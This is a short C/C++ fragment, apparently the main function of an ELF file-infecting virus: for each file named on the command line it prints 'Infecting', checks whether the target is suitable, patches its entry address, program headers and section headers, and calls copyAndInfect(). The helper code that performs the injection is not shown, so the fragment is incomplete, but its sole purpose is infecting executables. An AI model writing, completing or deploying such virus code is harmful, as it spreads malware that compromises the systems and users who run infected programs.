int main(int argc, char** argv)
{
  char** pp = argv;
  const char* p;
  while(0 != (p = *++pp))
  {
    fprintf(stderr, "Infecting %s...\n", p);

    Target target(p);
    if (target.isOpen() && target.isSuitable())
    {
      target.patchEntryAddr();
      target.patchPhdr();
      target.patchShdr();
      target.copyAndInfect();
    }
  }
  return 0;
}
